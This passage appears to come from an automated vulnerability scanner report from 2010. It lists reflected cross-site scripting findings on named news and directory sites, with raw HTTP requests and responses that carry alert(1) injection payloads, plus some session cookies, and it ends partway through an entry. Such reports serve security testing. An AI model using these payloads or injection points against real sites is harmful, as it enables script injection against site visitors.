This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /homes/Helen+Morris+Illegal+renos+such+drag/3994453b32ae'%3b4ebf56b551c/story.html HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 70316 Expires: Sun, 19 Dec 2010 03:25:19 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:25:19 GMT Connection: close Set-Cookie: ASP.NET_SessionId=ktjc3b55dknwqobtdfsor245; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/npo.com/homes/helen-morris-illegal-renos-such-drag/3994453b32ae';4ebf56b551c/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=homes;kw=helen-morris-illegal-renos-such-drag;kw=3994453b32ae';4ebf56b551c;kw=npo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=4441 ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef9fc'%3b39db886712e was submitted in the REST URL parameter 1. This input was echoed as ef9fc';39db886712e in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsef9fc'%3b39db886712e/IDMSquote.min.js HTTP/1.1 Host: www.nationalpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:54 GMT Date: Sun, 19 Dec 2010 03:03:54 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 48416
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 123df'%3b818f6bb5eeb was submitted in the REST URL parameter 1. This input was echoed as 123df';818f6bb5eeb in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js123df'%3b818f6bb5eeb/NPLib.min.js HTTP/1.1 Host: www.nationalpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:55 GMT Date: Sun, 19 Dec 2010 03:03:55 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 48376
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ecf66'%3ba94a0c62cd5 was submitted in the REST URL parameter 1. This input was echoed as ecf66';a94a0c62cd5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /jsecf66'%3ba94a0c62cd5/jquery.lazyload.mini.js HTTP/1.1 Host: www.nationalpost.com Proxy-Connection: keep-alive Referer: http://www.financialpost.com/small-business/best-cities/joint-venture/story.html?id=2155416 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 p3p: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 03:03:51 GMT Date: Sun, 19 Dec 2010 03:03:51 GMT Connection: close Vary: Accept-Encoding Connection: Transfer-Encoding Content-Length: 48485
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5995d'%3b491c5a1df17 was submitted in the REST URL parameter 1. This input was echoed as 5995d';491c5a1df17 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /related5995d'%3b491c5a1df17/topics/story.html HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 57650 Expires: Sun, 19 Dec 2010 02:59:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:59:01 GMT Connection: close Set-Cookie: ASP.NET_SessionId=ujjt3t55rlgdzaamtsjzvo45; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/npo.com/related5995d';491c5a1df17/topics/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=related5995d';491c5a1df17;kw=topics;kw=npo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=87729630?"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a97f9'%3bebec37cb034 was submitted in the REST URL parameter 2. This input was echoed as a97f9';ebec37cb034 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /related/topicsa97f9'%3bebec37cb034/story.html HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Content-Length: 63469 Expires: Sun, 19 Dec 2010 02:59:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:59:08 GMT Connection: close Set-Cookie: ASP.NET_SessionId=ma2xk3mkknjbr045ribrypfx; path=/; HttpOnly
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co ...[SNIP]... <script language="JavaScript1.1" src="http://ad.ca.doubleclick.net/N3081/adj/npo.com/related/topicsa97f9';ebec37cb034/story;loc=theTop;loc=top;sz=468x60,728x90;dcopt=ist;kw=ron;kw=related;kw=topicsa97f9';ebec37cb034;kw=npo;tile='+dartad_tile+';'+adcookieTag+surroundTag+'ord=91958526?"> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 404d6'%3b45a0852ff96 was submitted in the REST URL parameter 1. This input was echoed as 404d6';45a0852ff96 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /rss404d6'%3b45a0852ff96/feed.xml HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Pragma: no-cache Content-Type: text/html; charset=utf-8 Cache-Control: no-cache Expires: Sun, 19 Dec 2010 02:58:49 GMT Date: Sun, 19 Dec 2010 02:58:49 GMT Connection: close Connection: Transfer-Encoding Content-Length: 48437
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 731ba'%3b12e30f386ab was submitted in the REST URL parameter 1. This input was echoed as 731ba';12e30f386ab in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /search731ba'%3b12e30f386ab/index.html HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 03:25:27 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 03:25:27 GMT Connection: close Connection: Transfer-Encoding Content-Length: 45868
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2f112'%3bd82606ced4f was submitted in the REST URL parameter 1. This input was echoed as 2f112';d82606ced4f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /weather2f112'%3bd82606ced4f/index.html HTTP/1.1 Host: www.nationalpost.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP LAW CUR ADMo DEVo PSAo IVAo IVDi CONi OUR SAMi LEG UNI NAV INT STA PHY ONL PUR PRE" X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Sun, 19 Dec 2010 02:58:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 02:58:55 GMT Connection: close Connection: Transfer-Encoding Content-Length: 48531
1.330. http://www.newswire.ca/en/releases/archive/January2010/25/c3763.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.newswire.ca
Path:
/en/releases/archive/January2010/25/c3763.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37dd0"><script>alert(1)</script>bc2eb9aceb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /en/releases/archive/January2010/25/c3763.html?37dd0"><script>alert(1)</script>bc2eb9aceb2=1 HTTP/1.1 Host: www.newswire.ca Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 19 Dec 2010 03:25:17 GMT Server: Apache Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 20377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
1.331. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c78eb'-alert(1)-'69ab2d17a81 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?c78eb'-alert(1)-'69ab2d17a81=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=6F630E580B0CB321EE90CFE78D633FF5; __unam=c5114f2-12cfc9281ab-793cedb4-2; SPC=1292727684422-www.superpages.com-13613288-523135; s_sq=%5B%5BB%5D%5D; s_ppv=0; s_cc=true; s_lastvisit=1292727650045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660; s_vi=[CS]v1|2686BACD851D3EEE-4000010A6046DE64[CE]; OAX=rnneEk0NdZgACw4+; s_dfa=superpagescom; RMFD=011PU9WqO20escwY; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Sun, 19 Dec 2010 03:38:37 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Sun, 19-Dec-2010 03:53:37 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a HREF="http://mapserver.superpages.com/mapbasedsearch/?spheader=true&L='+L_encoded+'&SRC=&c78eb'-alert(1)-'69ab2d17a81=1" rel="nofollow"> ...[SNIP]...
1.332. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 126d4"><script>alert(1)</script>bd8bb29c884 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?126d4"><script>alert(1)</script>bd8bb29c884=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=6F630E580B0CB321EE90CFE78D633FF5; __unam=c5114f2-12cfc9281ab-793cedb4-2; SPC=1292727684422-www.superpages.com-13613288-523135; s_sq=%5B%5BB%5D%5D; s_ppv=0; s_cc=true; s_lastvisit=1292727650045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660; s_vi=[CS]v1|2686BACD851D3EEE-4000010A6046DE64[CE]; OAX=rnneEk0NdZgACw4+; s_dfa=superpagescom; RMFD=011PU9WqO20escwY; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Sun, 19 Dec 2010 03:38:35 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Sun, 19-Dec-2010 03:53:35 GMT;path=/
1.333. http://www.superpages.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 9edb1--><script>alert(1)</script>6d4c4378f09 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /?9edb1--><script>alert(1)</script>6d4c4378f09=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=6F630E580B0CB321EE90CFE78D633FF5; __unam=c5114f2-12cfc9281ab-793cedb4-2; SPC=1292727684422-www.superpages.com-13613288-523135; s_sq=%5B%5BB%5D%5D; s_ppv=0; s_cc=true; s_lastvisit=1292727650045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660; s_vi=[CS]v1|2686BACD851D3EEE-4000010A6046DE64[CE]; OAX=rnneEk0NdZgACw4+; s_dfa=superpagescom; RMFD=011PU9WqO20escwY; s_pv=Business%20Profile;
Response
HTTP/1.0 200 OK Date: Sun, 19 Dec 2010 03:38:41 GMT Server: Unspecified Vary: Host Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660;expires=Sun, 19-Dec-2010 03:53:42 GMT;path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml"> <head ...[SNIP]... <a href="?SRC=&9edb1--><script>alert(1)</script>6d4c4378f09=1#" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9e83c"-alert(1)-"2b3addc60f4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Placerville-CA9e83c"-alert(1)-"2b3addc60f4/PLA-L0122828089.htm HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1292727588738-www.superpages.com-30487379-54978; Domain=.superpages.com; Expires=Fri, 18-Dec-2015 02:59:48 GMT; Path=/ Set-Cookie: JSESSIONID=D028F740E58EB1E89A1B41ABFED46054; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 105157 Date: Sun, 19 Dec 2010 02:59:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2 ...[SNIP]... ages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/Placerville-CA9e83c"-alert(1)-"2b3addc60f4/PLA-L0122828089.htm?="; var client_id = "133515049997773"; var redirecturl = 'http://www.superpages.com/bp/Facebook?prev=yp_profile'; //--> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a2499"-alert(1)-"5cb28b9ac6c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Placerville-CA/PLA-L0122828089.htma2499"-alert(1)-"5cb28b9ac6c HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html id="search-basic" lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/ ...[SNIP]... 8340025&TS=nbt&OF=1&ACTION=log,red'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htma2499"-alert(1)-"5cb28b9ac6c?="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
1.336. http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/bp/Placerville-CA/PLA-L0122828089.htm
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 66d4f"-alert(1)-"33ce433e8f9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bp/Placerville-CA/PLA-L0122828089.htm?66d4f"-alert(1)-"33ce433e8f9=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: SPC=1292727569056-www.superpages.com-18714612-159631; Domain=.superpages.com; Expires=Fri, 18-Dec-2015 02:59:29 GMT; Path=/ Set-Cookie: JSESSIONID=66F1FC70EEAF1CB1A6E414D0EF269504; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 32473 Date: Sun, 19 Dec 2010 02:59:28 GMT Connection: close
var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/Placerville-CA/PLA-L0122828089.htm?66d4f"-alert(1)-"33ce433e8f9=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91e52"-alert(1)-"3a80c3c814d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Date: Sun, 19 Dec 2010 03:05:14 GMT Content-Length: 57389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ellowpages.superpages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://www.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://www.superpages.com/bp/xmlproxy91e52"-alert(1)-"3a80c3c814d?url=http%3A%2F%2Fugc-int.superpages.com%2Fugcwiki%2FGetPhotoServlet%3FlistingId%3D0122828089"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
1.338. http://www.superpages.com/coupons [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.superpages.com
Path:
/coupons
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c029f"-alert(1)-"2312b370fab was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /coupons?c029f"-alert(1)-"2312b370fab=1 HTTP/1.1 Host: www.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: JSESSIONID=6F630E580B0CB321EE90CFE78D633FF5; __unam=c5114f2-12cfc9281ab-793cedb4-2; SPC=1292727684422-www.superpages.com-13613288-523135; s_sq=%5B%5BB%5D%5D; s_ppv=0; s_cc=true; s_lastvisit=1292727650045; NSC_xxx-tvqfsqbhft-dpn-80=ffffffff9482136245525d5f4f58455e445a4a423660; s_vi=[CS]v1|2686BACD851D3EEE-4000010A6046DE64[CE]; OAX=rnneEk0NdZgACw4+; s_dfa=superpagescom; RMFD=011PU9WqO20escwY; s_pv=Business%20Profile;
Response
